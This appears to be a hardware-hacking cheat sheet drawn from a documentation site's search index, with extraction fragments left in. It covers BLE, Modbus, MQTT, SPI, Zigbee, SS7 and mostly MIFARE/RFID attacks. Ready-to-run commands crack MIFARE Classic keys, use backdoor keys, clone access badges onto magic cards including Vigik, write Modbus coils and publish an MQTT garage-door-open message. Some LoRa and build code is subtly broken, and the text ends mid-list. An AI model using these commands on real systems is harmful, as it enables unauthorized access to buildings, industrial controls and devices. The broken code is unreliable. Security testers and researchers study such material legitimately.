wget https://www.kernel.org/pub/linux/bluetooth/bluez-5.18.tar.xz\ndpkg --get-selections | grep -v deinstall | grep bluez\ntar xvf bluez-5.18.tar.xz\nsudo apt-get install libglib2.0-dev libdbus-1-dev libusb-dev libudev-dev libical-dev systemd libreadline-dev\n.configure --enable-library\nmake -j8 && sudo make install\nsudo cp attrib/gatttool /usr/local/bin/\nBLE is based on specification called General Attribute profile (GATT), that defines how communication/data transfer between client and server.
Using bettercap/bettercap
sudo bettercap -eval \"net.recon off; events.stream off; ble.recon on\"\nble.show\nble.enum 04:52:de:ad:be:ef\nUsing expliot_framework/expliot
# List of Services\nrun ble.generic.scan -a <mac address> -s\n# List of characteristics\nrun ble.generic.scan -a <mac address> -c\nUsing hackgnar/bleah
sudo bleah -b $MAC -e\nUsing bluez/gatttool, we can enumerate the services and their characteristics, use sudo gatttool -b $MAC -I to have an interactive gatttool shell:
MAC=30:AE:A4:2A:54:8A\n\n$ gatttool -b $MAC --primary\nattr handle = 0x0001, end grp handle = 0x0005 uuid: 00001801-0000-1000-8000-00805f9b34fb\nattr handle = 0x0014, end grp handle = 0x001c uuid: 00001800-0000-1000-8000-00805f9b34fb\nattr handle = 0x0028, end grp handle = 0xffff uuid: 000000ff-0000-1000-8000-00805f9b34fb\n# Services whose UUID start with 00001801 and 00001800 are special values defined in the norm\n# The other is a custom one which holds the CTF\n\n$ gatttool -b $MAC --characteristics\nhandle = 0x0002, char properties = 0x20, char value handle = 0x0003, uuid = 00002a05-0000-1000-8000-00805f9b34fb\nhandle = 0x0015, char properties = 0x02, char value handle = 0x0016, uuid = 00002a00-0000-1000-8000-00805f9b34fb\nRead data with gatttool
$ sudo gatttool -b $MAC -I\n[00:1A:7D:DA:71:06][LE]> connect\nList characteristics
[00:1A:7D:DA:71:06][LE]> characteristics\nhandle: 0x000b, char properties: 0x0a, char value handle: 0x000c, uuid: 4b796c6f-5265-6e49-7342-61644a656469\nRead characteristic at char handle
[00:1A:7D:DA:71:06][LE]> char-read-hnd 0x000c\nCharacteristic value/descriptor: 44 65 63 72 79 70 74 20 74 68 65 20 6d 65 73 73 61 67 65 2c 20 77 72 69 74 65 20 74 68 65 20 64 65 63 72 79 70 74 65 64 20 76 61 6c 75 65 20 61 6e 64 20 72 65 61 64 20 62 61 63 6b 20 74 68 65 20 72 65 73 70 6f 6e 73 65 20 74 6f 20 66 6c 61 67 2e 20 45 6e 63 72 79 70 74 65 64 20 6d 65 73 73 61 67 65 3a 20 63 34 64 33 32 38 36 35 37 61 39 64 62 33 64 66 65 39 31 64 33 36 36 36 62 39 34 31 62 33 36 31\nOne liner to read a characteristic
$ gatttool -b $MAC --char-read -a 0x002a|awk -F':' '{print $2}'|tr -d ' '|xxd -r -p;printf '\\n'\n$ gatttool -b $MAC -a 0x0040 --char-write-req --value=0100 --listen\n$ gatttool -b $MAC -a 0x0044 --char-write-req --value=0200 --listen\nUsing bettercap/bettercap
ble.recon on\nble.write 04:52:de:ad:be:ef 234bfbd5e3b34536a3fe723620d4b78d ffffffffffffffff\nUsing bluez/gatttool
$ gatttool -b $MAC --char-write-req -a 0x002c -n $(echo -n \"12345678901234567890\"|xxd -ps)\n\n# With char-write, we perform a Write Command and don't expect a response from the server\n# With char-write-req, we perform a Write Request and expect a response from the server\n$ gatttool -b $MAC -a 0x0050 --char-write-req --value=$(echo -n 'hello' | xxd -p)\n\n# inside gatttool shell\n[00:1A:7D:DA:71:06][LE]> char-write-req 0x000c 476f6f64205061646177616e21212121\n[00:1A:7D:DA:71:06][LE]> char-read-hnd 0x000c\nCharacteristic value/descriptor: 43 6f 6e [...] 2e\nChange the Bluetooth MAC address
$ bdaddr -r 11:22:33:44:55:66\n$ gatttool -I -b E8:77:6D:8B:09:96 -t random\nYou need 3 ubertooth.
ubertooth-btle -U 0 -A 37 -f -c bulb_37.pcap\nubertooth-btle -U 1 -A 38 -f -c bulb_38.pcap\nubertooth-btle -U 2 -A 39 -f -c bulb_39.pcap\nEnable the Bluetooth HCI log on the device via Developer Options.
It works like a hook in the stack to capture all the HCI packets in a file. For most Android devices, the log file is at /sdcard/btsnoop_hci.log or /sdcard/oem_log/btsnoop/
$ adb devices\n$ adb pull /sdcard/oem_log/btsnoop/<your log file>.log\n$ adb pull /sdcard/btsnoop_hci.log\n$ adb bugreport filename\nThe Controller Area Network (CAN) bus is a high-integrity serial communication protocol designed for real-time data exchange in embedded systems, particularly in automotive and industrial applications. It operates on a multi-master, message-oriented architecture, allowing multiple devices (nodes) to communicate on the same network without a central controller.
"},{"location":"protocols/can/#interact","title":"Interact","text":"pip install python-can\npip install python-can-utils\nimport can\nbus = can.Bus()\nwhile True:\n msg = can.Message(3, data=[0 for _ in range(8)])\n bus.send(msg)\nUnified Diagnostic Services (UDS) is a communication protocol used in automotive Electronic Control Units (ECUs) to enable diagnostics, firmware updates, routine testing and more.
"},{"location":"protocols/can/#implementation","title":"Implementation","text":"DNP3 Clients
DNP3 Nmap Script
Source: dnp3-enumerate.nse
nmap -sT --script dnp3-enumerate.nse -p 20000 <target_ip>\nTODO
"},{"location":"protocols/http/","title":"HTTP","text":"I2C (Inter-Integrated Circuit), pronounced \"I-squared-C\" or \"I-two-C\", is a popular communication protocol mainly used for low-speed, short-distance communication in embedded systems.
"},{"location":"protocols/i2c/#analysis","title":"Analysis","text":" Enable I2C on the Raspberry Pi via raspi-config
i2c-tools
sudo apt-get install i2c-tools\ni2cdetect -y 1\neeprog
wget http://darkswarm.org/eeprog-0.7.6-tear5.tar.gz\ntar -xvf eeprog-0.7.6-tear5.tar.gz eeprog-0.7.6-tear12/\ncd eeprog-0.7.6-tear12/\nmake\nsudo make install\nHydraBus
i2c1> show pins\ni2c1> scan\n./eeprog -x /dev/i2c-1 0x50 -16 -r 0x00:0x10echo \"hello\" | ./eeprog -f -16 -w 0 -t 5 /dev/i2c-1 0x50arduino-LoRa\\ use 868.1MHZ with SpreadFactor 10
#include <SPI.h>\n#include <LoRa.h>\n\nvoid setup() {\n Serial.begin(9600);\n while (!Serial);\n\n Serial.println(\"LoRa Receiver\");\n\n if (!LoRa.begin(868.1E6)) {\n Serial.println(\"Starting LoRa failed!\");\n while (1);\n }\n LoRa.setSpreadingFactor(10);\n}\n\nvoid onReceive(int packetSize) {\n\n Serial.print(\"packet recv\\n\");\n // read packet\n for (int i = 0; i < packetSize; i++) {\n Serial.print((char)LoRa.read());\n }\n}\n\nvoid loop() {\n LoRa.receive();\n LoRa.onReceive(onReceive); \n}\n#include <SPI.h>\n#include <LoRa.h>\n\nfloat freq[5] = { 868.3E6, 868.5E6, 867.1E6, 867.5E6, 867.7E6, 867.9E6 }; \n\nvoid setup() {\n Serial.begin(9600);\n while (!Serial);\n\n Serial.println(\"LoRa Receiver\");\n\n if (!LoRa.begin(868.1E6)) {\n Serial.println(\"Starting LoRa failed!\");\n while (1);\n }\n LoRa.setSpreadingFactor(10);\n}\n\nvoid onReceive(int packetSize) {\n\n Serial.print(\"packet recv\\n\");\n // read packet\n for (int i = 0; i < packetSize; i++) {\n Serial.print((char)LoRa.read());\n }\n}\n\nvoid loop() {\n\n LoRa.receive();\n LoRa.onReceive(onReceive);\n delay(5000);\n While(1) {\n int i;\n for(i=0; i < 5 ; i++)\n {\n\n LoRa.setFrequency(freq[i]);\n int j;\n for(j=7; j <= 12; j++)\n {\n\n // loop on spreading factor is finish, set new freq\n LoRa.setSpreadingFactor(i);\n delay(5000);\n }\n }\n }\n}\nThe Received Signal Strength Indication (RSSI) is the received signal power in milliwatts and is measured in dBm.
The RSSI is measured in dBm and is a negative value.\\ The closer to 0 the better the signal is.
Typical LoRa RSSI values are:
#include <SPI.h>\n#include <LoRa.h>\n\nvoid setup() {\n Serial.begin(9600);\n while (!Serial);\n\n Serial.println(\"LoRa Receiver\");\n\n if (!LoRa.begin(867.1E6)) {\n Serial.println(\"Starting LoRa failed!\");\n while (1);\n }\n LoRa.setSpreadingFactor(8);\n}\n\nvoid onReceive(int packetSize) {\n Serial.print(\"packet recv\\n\");\n int rssi = LoRa.packetRssi();\n Serial.print(rssi);\n}\n\nvoid loop() {\n LoRa.receive();\n LoRa.onReceive(onReceive);\n delay(1000);\n}\nMMS Client
MMS Discovery Nmap Script
Source: mms-identify.nse
nmap -d --script mms-identify.nse --script-args='mms-identify.timeout=500' -p 102 <target_host>\nModbus Client:
Modbus Discover Nmap Script:
nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502 <host>\nConnect to Modbus Slave:
from pymodbus.client import ModbusTcpClient\n\nclient = ModbusTcpClient('<IP_Address_of_Target>')\nclient.write_coil(1, True)\nresult = client.read_coils(1,1)\nprint(result.bits[0])\nclient.close()\nModbus Pentesting:
Modbus Slave Simulator
Modbus Master Simulator
MQTT client:
Scan an MQTT with nmap : nmap -p 1883 -vvv --script=mqtt-subscribe -d sensors.domain.com
mosquitto_sub -h sensors.domain.com -t '#'\nmosquitto_sub -h sensors.domain.com -t '+'\nmosquitto_sub -h sensors.domain.com -t \"/sensor/\"\nConnect and subscribe to every topics using the # keyword.
import paho.mqtt.client as mqtt\ndef on_connect(client, userdata, flags, rc):\n print \"[+] Connection successful\"\n client.subscribe('#', qos = 1) # Subscribe to all topics\n client.subscribe('$SYS/#') # Broker Status (Mosquitto)\ndef on_message(client, userdata, msg):\n print '[+] Topic: %s - Message: %s' % (msg.topic, msg.payload)\nclient = mqtt.Client(client_id = \"MqttClient\")\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect('SERVER IP HERE', 1883, 60)\nclient.loop_forever()\nSend MQTT requests
import paho.mqtt.client as mqtt\ndef on_connect(client, userdata, flags, rc):\n print \"[+] Connection success\"\nclient = mqtt.Client(client_id = \"MqttClient\")\nclient.on_connect = on_connect\nclient.connect('IP SERVER HERE', 1883, 60)\nclient.publish('smarthouse/garage/door', \"{'open':'true'}\")\nAmiibo are small figurines or cards produced by Nintendo that contain Near Field Communication (NFC) chips. These chips allow the Amiibo to interact with various Nintendo gaming systems, such as the Wii U, Nintendo 3DS, and Nintendo Switch.
"},{"location":"protocols/ntag215-amiibo/#tools","title":"Tools","text":"Nintendo added their own layer of encryption and digital signing to increase security. The digital signing prevents you from blindly altering the game data bytes because then the signature will no longer match. Additionally, the signature is also based on the UID of the tag, so you can't simply copy the bytes from an Amiibo to a blank NTAG215 to clone it.
"},{"location":"protocols/ntag215-amiibo/#password-reverse-engineering","title":"Password Reverse Engineering","text":"The password is derived from the 7-byte tag UID (Unique Identifier) of the Amiibo. The algorithm used to generate the password is as follows:
password[0] = 0xAA ^ (uid[1] ^ uid[3])\npassword[1] = 0x55 ^ (uid[2] ^ uid[4])\npassword[2] = 0xAA ^ (uid[3] ^ uid[5])\npassword[3] = 0x55 ^ (uid[4] ^ uid[6])\nThe algorithm takes specific bytes of the UID, performs XOR operations with constant values (0xAA and 0x55), and combines them to form the 32-bit password.
"},{"location":"protocols/ntag215-amiibo/#references","title":"References","text":"SS7 plays a part in the transportation of SMS messages. An attacker may be able to register a victims MSISDN (mobile number) on a fake MSC (Mobile Switching Centre), the victims operator's HLR (Home Location Register) that works as a kind of telephone directory for MSISDNs, operators and SMS service centres (SMSC) will set the new location for the Victim\u2019s MSISDN.
When, for this example the victims Bank sends them a 2FA authentication token the MSC transfers the SMS to the SMSC the real MSMSC asks the victims operator's HLR for the victims location, the HLR replies with the attacker operated MSC. The real operator's SMSC transfers the SMS to the fake MSC operated by the attack.
One of the simplest and most accessible attacks is SMS spoofing, which doesn't require direct access to the SS7 network. Many people are unaware that the \"from\" field in an SMS message lacks authentication, allowing it to be easily forged. The sender can insert any alphanumeric word into the \"from\" section of a message.
SMS spoofing attacks can be carried out with minimal cost by using an SMS gateway service, many of which are accessible on the clear web. According to SOS Intelligence, most of these services lack abuse monitoring or prevention mechanisms. As a result, it\u2019s possible to send spoofed messages to a victim\u2014much like phishing emails\u2014prompting them to take action, often at little to no cost.
"},{"location":"protocols/signaling-system-7/#location-tracking","title":"Location Tracking","text":"Within the SS7 network of a network operator it may be possible to request the LAC (Location Area Code) and Cell ID and with that information get a reasonably good location for a victim. However, this may require the prior knowledge of the subscribers IMEI (International Equipment Identity) or/and IMSI (International Mobile Subscriber Identity) \u2013 A MSISDN alone may not be sufficient to be able to query this information.
Serial Peripheral Interface (SPI), is a type of communication protocol used primarily in microcontroller-based systems The controller selects a chip it send and receive information to and from. NOR flash chips with an SPI interface are commonly used as firmware boot chip. SPI has one read and one write line. In QSPI mode, 4 lines are used in parallel.
SPI mainly involves four lines or wires:
screen /dev/ttyACM0 115200\nspi\n\n# RDID Read Identification Sequence example\n[ 0x9f hd:3 ]\n\n# Read data from the beginning of the chip\n[ 0x03 0x00 0x00 0x00 hd:1024 ]\nsudo raspi-confi > Interface > SPI(P4)\n# NOTE: might need a press/hold the reset button\n\n# check\nsudo flashrom -p linux spi:dev=/dev/spidev0.0,spispeed=1000\n\n# dump\nsudo flashrom -p linux spi:dev=/dev/spidev0.0,spispeed=1000 -r dump.bin\nAn ESP8266 and ESP32 have several SPI busses available in hardware, SPI0 is hooked up to it's own internal flash and is not intended for use, but the HSPI and VSPI busses can be used in combination with a SOIC-8 clamp to read from SPI NOR chips. cheap clips have a tendency to jump off the chips, pomona 5250 has a better grip.
$ python ./esptool.py read_flash --spi-connection HSPI 0 0x400000 flash_dump.bin\nflashrom --programmer serprog:dev=/dev/ttyACM0,spispeed=2M -c \"MX25L12833F\" --progress -r /tmp/image.bin\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V\n\nflashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V -r firmware.bin\n$ cd ~/.arduino15/packages/esp32/tools/esptool/2.3.1\n$ python ./esptool.py -p /dev/ttyUSB0 -b 460800 read_flash 0x300000 0x0fb000 /tmp/spiffs.bin\n\n$ cd ~/.arduino15/packages/esp32/tools/mkspiffs/0.2.3\n$ ./mkspiffs -u /tmp/data -p 256 -b 8192 -s 1028096 /tmp/spiffs/bin\nColor coded which pins can be connected from the ESP HSPI pins to an SPI flash. The pink interfaces (DQ1 and DQ2) are optional, they are only used in QSPI mode.
"},{"location":"protocols/spi/#references","title":"References","text":"
TODO
"},{"location":"protocols/usb/","title":"USB","text":""},{"location":"protocols/usb/#usb-type-2","title":"USB Type 2","text":""},{"location":"protocols/usb/#usb-type-3","title":"USB Type 3","text":""},{"location":"protocols/usb/#usb-type-c","title":"USB Type C","text":""},{"location":"protocols/usb/#fuzzing","title":"Fuzzing","text":"Zigbee is a specification for a suite of high-level communication protocols using low-power digital radios. It's designed for use in areas like home automation, medical data collection, industrial control systems, and other applications that require secure and reliable wireless communication.
Zigbee is an IEEE 802.15.4-based, wireless networking standard, which is basically used for two-way communication between sensors and control systems. Zigbee is a short-range wireless communication standard like Bluetooth and Wi-Fi while covering a range of 10 to 100 meters.
"},{"location":"protocols/zigbee/#tools","title":"Tools","text":"Zigbee includes several layers of security, including AES-128 encryption, to ensure that data is transmitted securely across the network.
The Zigbee Default Trust Center Link Key is a predefined cryptographic key used in Zigbee networks to secure the initial joining process of a new device to the network. It's part of the security measures implemented within the Zigbee protocol to ensure that only authorized devices can join a particular network.
When a new device wants to join a Zigbee network, it must first establish a secure connection with the Trust Center. To do this, the device and the Trust Center use the Default Trust Center Link Key to encrypt their communication.
For the profile \"Home Automation\" the default Trust Center Link Key is : ZigBeeAlliance09 (\"5A:69:67:42:65:65:41:6C:6C:69:61:6E:63:65:30:39\").
You can use it in Wireshark: Edit > Preferences > Protocols > Zigbee NWK, then \"New\" and write the key in hex format.
Example: CVE-2020-28952 - Athom Homey Static and Well-known Keys
"},{"location":"protocols/zigbee/#references","title":"References","text":"New method for Proxmark : hf mf autopwn
Common keys to try against the card when attempting a dictionnary attack.
Key Description FFFFFFFFFFFF Default key 000000000000 Blank key A396EFA4E24F FM11RF08S universal backdoor key A31667A8CEC1 FM11RF08 older backdoor keyMore keys and dictionnaries can be found at the following links:
hf mf chk *1 ? t # Default keys\nhf mf chk *1 ? d default_keys.dic\nhf mf chk 0 A default_keys.dic # Dictionary attack with file: default_keys.dic\nProxmark method
pm3> hf search\npm3> hf mfu\npm3> hf mf darkside (fork command)\npm3> hf mf mifare (original command)\nParity is all zero. Most likely this card sends NACK on every failed authentication. # Card is empty...\nor\nFound valid key:ffffffffffff # KEY_FOUND\n\npm3> hf mf chk 0 A KEY_FOUND (Check Found Key On Block 0 A)\nACR122u method
# start cracking the first key of the first sector. \nmfcuk -C -R 0:A -v 3 -s 250 -S 250\nmfcuk -C -R 3:A -v 3 -s 250 -S 250 -o mycard.mfc\nNeed to find a default key to extract the others
Proxmark method
hf search\nhf mf chk 1 ? t # \"Test Block Keys\" command which will test the default keys for us\nhf mf nested 1 0 A a0a1a2a3a4a5 t. # \"Nested Attack\" use the key a0a1a2a3a4a5, keeping the key in memory with \"t\"\nhf mf chk * ? # \"Test Block Keys\" command which will test the default keys for us\nhf mf nested 1 0 A ffffffffffff d # \"Nested Attack\" use the key ffffffffffff to extract the others (file:dumpkeys.bin)\nhf mf dump 1 # Dump content\nhf mf restore 1 # Restore content into the card\nhf mf wrbl 5 A 080808080808 32110000cdeeffff3211000005fa05fa # write on block 5, with the key 0808... the content 3211...\nhf mf rdbl 5 A 080808080808 # Read block 5 with the keu 0808..\n\n\npython pm3_mfd2eml.py dumpdata.bin dumpdata.eml\npm3> hf mf cload dumpdata\nACR122u method
nfc-list\nmfoc -O card.mfd # dump the memory of the tag\n# Le param\u00e8tre P permet de sp\u00e9cifier le nombre de sondes par secteur. Par d\u00e9faut, ce nombre est \u00e0 20 mais nous pouvons le passer \u00e0 500.\nmfoc -P 500 -O dump_first_try.dmp\nnfc-mfclassic w a key.mfd data.mfd # write data\nnfc-mfclassic W a key.mfd data.mfd # write data and sector 0\nOne key is needed in order to use this attack
For newest MIFARE Classic and MIFARE Plus SL1
Proxmark method
NOTE: These hardware changes resulted in the Proxmark 3 Easy being incapable of performing several of the Proxmark's advanced features, including the Mifare Hard-Nested attacks. In other word you need a real Proxmark, not a cheap chinese copy.
# find a default key\n# res column is either equal to 1 or 0. \n# A 1 in the column means the key was valid for that sector.\nhf mf chk *1 ? t\n\n\n# <block number> <key A|B> <key (12 hex symbols)>\n# <target block number> <target key A|B> [known target key (12 hex symbols)] [w] [s]\n# w: Acquire nonces and write them to binary file nonces.bin\nhf mf hardnested 0 A 8829da9daf76 4 A w\n\n# then https://github.com/aczid/crypto1_bs\n./solve_piwi 0xcafec0de.bin\n./solve_piwi_bs 0xcafec0de.bin\nACR122u method
With the key n\u00b0A a0a1a2a3a4a5 for sector 0 and we want key n\u00b0A for sector 1. This method can be reused for every sectors.
./libnfc_crypto1_crack a0a1a2a3a4a5 0 a 4 a\nFound tag with uid 62ef9e5a, collecting nonces for key A of block 4 (sector 1) using known key A a0a1a2a3a4a5 for block 0 (sector 0)\nCollected 2379 nonces... leftover complexity 23833993588 (~2^34.47) - initializing brute-force phase...\nStarting 4 threads to test 23833993588 states using 256-way bitslicing\nCracking... 88.93%\nFound key: c44e2b5e4ce3\nTested 21232975852 states\nUID - The original Chinese Magic Backdoor card. These cards respond to the backdoor commands and will show Chinese magic backdoor commands (GEN 1a) detected when you do an hf search. These cards can be detected by probing the card to see if it responds to the backdoor commands. Some RFID systems may try to detect these cards.
CUID - The 2nd generation Chinese Magic Backdoor card. These cards do not use the backdoor commands, but instead allow Block 0 to be written to like any other block on the card. This gives the card better compatibility to be written to from an Android phone. However, some RFID systems can detect this type of card by sending a write command to Block 0, making the card invalid after the first use is attempted.
FUID - This type of card is not as common, but allows Block 0 to be written to just once. This allows you to create a clone of a card and any checks done by the RFID system will pass because Block 0 is no longer writable.
UFUID - This type of card is apparently a \"better\" version of the FUID card. Instead of only allowing Block 0 to be written once, you can write to it many times and then lock the block later when you're happy with the result. After locking Block 0, it cannot be unlocked to my knowledge. I do not think there is currently a way to lock these cards using the Proxmark3.
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-gen-2","title":"Magic Chinese Card - GEN 2","text":"They can be copied directly. The software allows a new UID.
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#magic-chinese-card-gen-1a","title":"Magic Chinese Card - GEN 1a","text":"Works better on the official client.py instead of the iceman fork.
Reset a UID Changeable Magic Card (7 bytes UID) You should prefer this method !
proxmark3> hf mf csetuid 42917CAB 0004 08\nuid:42 91 7c ab \n--atqa:00 04 sak:08 \nChinese magic backdoor commands (GEN 1a) detected \nTo set all the block hf mf csetblk 0 42917CAB00080400022A2C87933EF21D
NOTE: The UID from several cards can be computed with the displayed id, e.g: ID is 2910621770.
import struct\nstruct.pack('<I',2910621770).encode('hex')\n'4a907cad'\nIf you set the wrong BCC for UID and can't read the card anymore, you can use some backdoor commands to change sector 0 using Proxmark:
hf 14a raw -a -p -b 7 40\nhf 14a raw -p 43\nhf 14a raw -p -c a0 00\nhf 14a raw -p -c de ad be ef 22 08 04 00 46 59 25 58 49 10 23 02\nAvoid writing wrbl 3 (contains key A/B + permissions)
proxmark3> hf mf wrbl 1 a ffffffffffff 000102030405060708090a0b0c0d0e0f \nproxmark3> hf mf wrbl 2 a ffffffffffff 464c4147313a4d31664072335f303037\nhf mf rdsc <sector number> <key A/B> <key (12 hex symbols)>\nproxmark3> hf mf dump 1 k hf-mf-A29558E4-key.bin f hf-mf-A29558E4-data.bin\n\n<card memory>: 0 = 320 bytes (Mifare Mini), 1 = 1K (default), 2 = 2K, 4 = 4K\nk <name> : key filename, if no <name> given, UID will be used as filename\nf <name> : data filename, if no <name> given, UID will be used as filename\nEmulate from a dump file
# convert .bin to .eml\nproxmark3> script run dumptoemul -i dumpdata.bin\nproxmark3> hf mf eload <file name w/o .eml>\nSimulate Mifare 1K UID
proxmark3> hf mf sim u 353c2aa6\nhf 14a snoop\n# read card\n# push button\n\nhf list 14a\n089220 | 095108 | Tag | 4d xx xx xx d3 | | UID\n114608 | 125072 | Rdr | 93 70 4d xx xx xx d3 4f 8d | ok | SELECT_UID\n...\n525076 | 529748 | Tag | 61 7a 66 18 | | TAG CHALLENGE\n540608 | 549920 | Rdr |50! 87! 8e ab 3b! 49 5a 1b | !crc| HALT\n551188 | 555860 | Tag |d6! 53! 7c 57! | | TAG RESPONSE\nUID: 4dxxxxxxd3\nTAG CHALLENGE: 617a6618\nREADER CHALLENGE: 50878eab\nREADER RESPONSE: 3b495a1b\nTAG RESPONSE: d6537c57\n\n# crapto1gui or mfkey\ncd tools/mfkey\nmake\n./mfkey64\n./mfkey64 xxxxxxxx 3b45a45a 7ddb6646 142fc1b9 9195fb3f\nEmulate a MIFARE Classic with a DEADBEEF UID.
proxmark3> hf mf sim u deadbeef n 1 x\nmf 1k sim uid: de ad be ef , numreads:0, flags:18 (0x12)\n#db# Collected two pairs of AR/NR which can be used to extract keyA from reader for sector 1:\n#db# ../tools/mfkey/mfkey32 deadbeef 0102xxxx 4d9axxxx 87e7xxxx 06d2xxxx b4a0xxxx\n#db# Emulator stopped. Tracing: 1 trace length: 253\n#db# 4B UID: deadbeef\npip install bitstring\ngit clone https://github.com/zhovner/mfdread\nmfdread.py ./dump.mfd\nBlock 0 is writable through normal Mifare Classic commands, i.e. there is not special \"unlocked\" read/write like in \"magic Mifare 1k\" version.
Writing block 0 with Proxmark, UID 01020304, using key A being FFFFFFFFFFFF:
hf mf wrbl 0 a FFFFFFFFFFFF 01020304040000000000000000000000\nAgain, watch out to have correct BCC and avoid Cascading Tag (0x88) as first byte of UID, or you may make the card unselectable (i.e. brick it).
"},{"location":"protocols/rfid-nfc/hf-mifare-classic/#references","title":"References","text":"Each card has a master application with AID 0x000000 that saves the card's configuration. The memory organization of DESFire supports up to 28 applications on the card and up to 32 files in each application.
hf mfdes lsapp --no-auth # show applications list without authentication\nhf mfdes lsapp # show applications list with authentication from default settings\nhf mfdes lsapp --files # show applications list with their files\nhf mfdes getaids --no-auth # this command can return a simple AID list if it is enabled in the card settings\nEach application has an individual set of up to 14 application keys (can be AES-128 or DES keys)
"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#files","title":"Files","text":"Each file has it\u2019s own Communication Mode:
Dump files
hf mfdes lsfiles --aid 123456 -t aes # file list for application 123456 with aes key\nhf mfdes dump --aid 123456 # shows files and their contents from application 123456\nRead/Write files
Read
hf mfdes read --aid 123456 --fid 01 # autodetect file type (with hf mfdes getfilesettings) and read its contents\nhf mfdes read --aid 123456 --fid 01 --type record --offset 000000 --length 000001 # read one last record from a record file\nRead via ISO command set
hf mfdes read --aid 123456 --fileisoid 1000 --type data -c iso # select application via native command and then read file via ISO\nhf mfdes read --appisoid 0102 --fileisoid 1000 --type data -c iso # select all via ISO commands and then read\nhf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000001 # read one record (number 5) from file ID 1100 via ISO command set\nhf mfdes read --appisoid 0102 --fileisoid 1100 --type record -c iso --offset 000005 --length 000000 # read all the records (from 5 to 1) from file ID 1100 via ISO command set\nWrite
hf mfdes write --aid 123456 --fid 01 -d 01020304 # autodetect file type (with hf mfdes getfilesettings) and write data with offset 0\nhf mfdes write --aid 123456 --fid 01 --type data -d 01020304 --commit # write backup data file and commit\nhf mfdes write --aid 123456 --fid 01 --type value -d 00000001 # increment value file\nhf mfdes write --aid 123456 --fid 01 --type value -d 00000001 --debit #\u00a0decrement value file\nhf mfdes write --aid 123456 --fid 01 --type record -d 01020304 # write data to a record file\nhf mfdes write --aid 123456 --fid 01 --type record -d 01020304 --updaterec 0 # update record 0 (latest) in the record file.\nWrite via iso command set
hf mfdes write --appisoid 1234 --fileisoid 1000 --type data -c iso -d 01020304 # write data to std/backup file via ISO command set\nhf mfdes write --appisoid 1234 --fileisoid 2000 --type record -c iso -d 01020304 # send record to record file via ISO command set\nChanging the default keys is a crucial step in the deployment of MIFARE DESFire cards to prevent unauthorized cloning and access.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n00 00 00 00 00 00 00 00\nUse a key to get UID
hf mfdes getuid # authenticate with default key\nhf mfdes getuid -s d40 # via d40 secure channel\nhf mfdes getuid -s ev2 -t aes -k 11223344556677889900112233445566 # via ev2 secure channel with specified aes key\nhf mfdes detect # simply detect key for master application (PICC level)\nhf mfdes detect --save # detect key and save to defaults. look after to output of hf mfdes default\nhf mfdes detect -s d40 # detect via channel d40\nhf mfdes detect --dict mfdes_default_keys # detect key with help of dictionary file\nhf mfdes detect --aid 123456 -n 2 # detect key 2 from application with AID 123456\nhf mfdes auth -n 0 -t des -k 1122334455667788 --aid 123456 # try application 123456 master key\nhf mfdes auth -n 0 -t aes --save # try PICC AES master key and save the configuration to defaults if authentication succeeds\nThe UID of the modifiable MIFARE DESFire\u00ae Compatible UID tags consists of two parts: the UID itself and the BCC. The BCC is a checksum value calculated from the UID. If the BCC is incorrect, the tag will be rejected by the reader.
hf 14a raw -s -c 02 00 ab 00 00 00 07 xx xx xx xx xx xx xx xx xx\nFor MIFARE DESFire cards, Flipper Zero is able to emulate only the UID.
UID rewritable cards: - LAB 401 - MODIFIABLE MIFARE DESFIRE\u00ae COMPATIBLE UID - LAB 401 - MIFARE DESFIRE\u00ae COMPATIBLE MODIFIABLE UID / ATQA / SAK / ATS / APDU
"},{"location":"protocols/rfid-nfc/hf-mifare-desfire/#references","title":"References","text":"pm3 --> hf 14a raw -p -b 7 40\npm3 --> hf 14a raw -p 43\npm3 --> hf 14a raw -p -c a20059982120\n\n0x40, init backdoor mode\n0x41, wipe fills card with 0xFF\n0x42, fills card with 0x00\n0x43, no authentication needed. issue a 0x3000 to read block 0, or write block.\n0x44, fills card with 0x55\nhf 14a sim 2 <7-byte tag>\nVigik is essentially a rebranded version of MIFARE Classic because it uses the same underlying technology and standards.
modprobe -r pn533_usb\nmodprobe -r pn533\n\nnfc-list # Check the proper functioning of the reader\nmfoc -P 500 -O blank-card.dmp # Extract the encryption keys from the Chinese RFID chip into a file\nmfoc -P 500 -O original-card.dmp # Copy the content of the original RFID chip into a file\nnfc-mfclassic W a original-card.dmp blank-card.dmp # Write the content of the original chip onto the Chinese chip\nUsually the key A is 0x314b49474956 (\"1KIGIV\")
\"La Poste Service Universel\", 0x07AA, \"AB9953CBFCCD9375B6C028ADBAB7584BED15B9CA037FADED9765996F9EA1AB983F3041C90DA3A198804FF90D5D872A96A4988F91F2243B821E01C5021E3ED4E1BA83B7CFECAB0E766D8563164DE0B2412AE4E6EA63804DF5C19C7AA78DC14F608294D732D7C8C67A88C6F84C0F2E3FAFAE34084349E11AB5953AC68729D07715\"\n\"La Poste Service Universel\", 0x07AA, \"1577D02987C63A95B51AE149430834AEAF3F2E0F4CF8C6887AC6C8D732D79482604FC18DA77A9CC1F54D8063EAE6E42A41B2E04D1663856D760EABECCFB783BAE1D43E1E02C5011E823B24F2918F98A4962A875D0DF94F8098A1A30DC941303F98ABA19E6F996597EDAD7F03CAB915ED4B58B7BAAD28C0B67593CDFCCB5399AB\"\n\"La Poste Autres Services\", 0x07AB, \"A6D99B8D902893B04F3F8DE56CB6BF24338FEE897C1BCE6DFD4EBD05B7B1A07FD2EB564BB4F7D35DBFE0A42966C2C137AD156E3DAB62904592BCA20C0BC7B8B1E261EF82D53F52D203843566305A49A22062DECC38C2FE3864CAD08E79219487651E2F79F1C9392B48CAFE1BFFAFF4802AE451E7A283E55A4026AD1E82DF1A15\"\n\"La Poste Autres Services\", 0x07AB, 